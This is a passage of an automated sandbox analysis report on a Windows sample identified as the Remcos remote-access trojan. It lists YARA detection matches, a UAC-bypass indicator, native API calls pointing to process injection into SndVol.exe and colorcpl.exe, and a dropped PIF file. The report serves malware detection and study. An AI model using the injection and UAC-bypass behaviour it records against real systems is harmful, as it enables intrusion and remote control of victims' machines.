                  Source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 13.2.colorcpl.exe.6d30000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 9.2.SndVol.exe.48e1998.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 15.2.colorcpl.exe.7090000.2.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 9.2.SndVol.exe.48e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000D.00000002.1545537004.0000000006D30000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                  Source: Process Memory Space: SndVol.exe PID: 7944, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: colorcpl.exe PID: 5288, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: colorcpl.exe PID: 4540, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Windows\SysWOW64\SndVol.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02ECB11C GetModuleHandleW,NtOpenProcess,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx,0_2_02ECB11C
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC7A3C NtAllocateVirtualMemory,0_2_02EC7A3C
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02ECDC90 RtlD,NtCreateFile,NtWriteFile,NtClose,0_2_02ECDC90
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02ECDC08 RtlInitUnicodeString,RtlD,NtDeleteFile,0_2_02ECDC08
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC7D88 NtWriteVirtualMemory,0_2_02EC7D88
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02ECDD74 RtlD,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02ECDD74
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC84D8 NtProtectVirtualMemory,0_2_02EC84D8
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC7A3A NtAllocateVirtualMemory,0_2_02EC7A3A
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02ECDBB4 RtlInitUnicodeString,RtlD,NtDeleteFile,0_2_02ECDBB4
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC8D74 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02EC8D74
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EC8D72 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02EC8D72
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048FC0DC NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,9_2_048FC0DC
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFCode function: 11_2_02F4B11C NtOpenProcess,NtCreateThreadEx,11_2_02F4B11C
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFCode function: 11_2_02F47A3C NtAllocateVirtualMemory,11_2_02F47A3C
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFCode function: 11_2_02F47D88 NtWriteVirtualMemory,11_2_02F47D88
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFCode function: 11_2_02F4DD74 NtOpenFile,NtReadFile,11_2_02F4DD74
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFCode function: 11_2_02F484D8 NtProtectVirtualMemory,11_2_02F484D8
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFCode function: 11_2_02F47AD9 NtAllocateVirtualMemory,11_2_02F47AD9
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFCode function: 11_2_02F47A3A NtAllocateVirtualMemory,11_2_02F47A3A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D4C0DC NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,13_2_06D4C0DC
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02ECF7CC InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_02ECF7CC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,9_2_00414DB4
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048F5B4C ExitWindowsEx,LoadLibraryA,GetProcAddress,9_2_048F5B4C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress,13_2_00414DB4
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D45B4C ExitWindowsEx,LoadLibraryA,GetProcAddress,13_2_06D45B4C
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: 0_2_02EB20C40_2_02EB20C4
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004251529_2_00425152
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004352869_2_00435286
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004513D49_2_004513D4
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0045050B9_2_0045050B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004365109_2_00436510
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004316FB9_2_004316FB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0043569E9_2_0043569E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004437009_2_00443700
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004257FB9_2_004257FB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004128E39_2_004128E3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_004259649_2_00425964
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0041B9179_2_0041B917
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0043D9CC9_2_0043D9CC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00435AD39_2_00435AD3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00424BC39_2_00424BC3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0043DBFB9_2_0043DBFB
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0044ABA99_2_0044ABA9
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00433C0B9_2_00433C0B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00434D8A9_2_00434D8A
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0043DE2A9_2_0043DE2A
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0041CEAF9_2_0041CEAF
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_00435F089_2_00435F08
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_049124939_2_04912493
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_049244989_2_04924498
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_049164369_2_04916436
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_049065939_2_04906593
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048FC6AF9_2_048FC6AF
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_049066FC9_2_049066FC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048F367B9_2_048F367B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0491E7649_2_0491E764
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0491601E9_2_0491601E
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0493216C9_2_0493216C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_049312A39_2_049312A3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_049172A89_2_049172A8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04916CA09_2_04916CA0
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_048FDC479_2_048FDC47
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04905EEA9_2_04905EEA
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0491686B9_2_0491686B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0491E9939_2_0491E993
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_049149A39_2_049149A3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0490595B9_2_0490595B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0492B9419_2_0492B941
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_0491EBC29_2_0491EBC2
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_04915B229_2_04915B22
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFCode function: 11_2_02F320C411_2_02F320C4
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0042515213_2_00425152
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0043528613_2_00435286
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004513D413_2_004513D4
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0045050B13_2_0045050B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0043651013_2_00436510
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004316FB13_2_004316FB
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0043569E13_2_0043569E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0044370013_2_00443700
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004257FB13_2_004257FB
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_004128E313_2_004128E3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0042596413_2_00425964
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0041B91713_2_0041B917
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0043D9CC13_2_0043D9CC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00435AD313_2_00435AD3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00424BC313_2_00424BC3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0043DBFB13_2_0043DBFB
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0044ABA913_2_0044ABA9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00433C0B13_2_00433C0B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00434D8A13_2_00434D8A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0043DE2A13_2_0043DE2A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_0041CEAF13_2_0041CEAF
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_00435F0813_2_00435F08
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D566FC13_2_06D566FC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D4C6AF13_2_06D4C6AF
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D4367B13_2_06D4367B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D6E76413_2_06D6E764
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D6249313_2_06D62493
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D7449813_2_06D74498
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D6643613_2_06D66436
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D5659313_2_06D56593
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D812A313_2_06D812A3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D672A813_2_06D672A8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D6601E13_2_06D6601E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D8216C13_2_06D8216C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D55EEA13_2_06D55EEA
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D66CA013_2_06D66CA0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D4DC4713_2_06D4DC47
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D6EBC213_2_06D6EBC2
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D65B2213_2_06D65B22
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D6686B13_2_06D6686B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D6E99313_2_06D6E993
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D649A313_2_06D649A3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D5595B13_2_06D5595B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 13_2_06D7B94113_2_06D7B941
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFCode function: String function: 02F4895C appears 50 times
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFCode function: String function: 02F34860 appears 683 times
                  Source: C:\Users\Public\Libraries\Ntmftfld.PIFCode function: String function: 02F346D4 appears 155 times
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: String function: 02EB44DC appears 74 times
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: String function: 02EC895C appears 56 times
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: String function: 02EB4500 appears 33 times
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: String function: 02EB4860 appears 949 times
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: String function: 02EB46D4 appears 244 times
                  Source: C:\Users\user\Desktop\1m181Ru74o.exeCode function: String function: 02EC89E0 appears 45 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 00402073 appears 51 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 00432525 appears 41 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06D63928 appears 53 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06D632BD appears 41 times
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 00432B90 appears 53 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 04913928 appears 53 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00402073 appears 51 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00432525 appears 41 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 049132BD appears 41 times
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: String function: 00432B90 appears 53 times
                  Source: 1m181Ru74o.exeBinary or memory string: OriginalFilename vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378273433.000000007E850000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1296625632.000000007FC5F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1399478941.0000000015B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1378549293.000000007EE50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1296854371.000000000290C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000002.1425448990.00000000022C5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000002.1425970905.0000000002904000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1399478941.0000000015B42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D37000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000002.1456843128.000000007EEA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000002.1460211820.000000007FA30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1296854371.0000000002908000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000003.1297153626.000000007F8EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000002.1425970905.0000000002908000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exe, 00000000.00000002.1436624594.0000000014D7E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 1m181Ru74o.exe
                  Source: 1m181Ru74o.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 9.2.SndVol.exe.48e0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 15.2.colorcpl.exe.7091998.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                  Source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 9.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
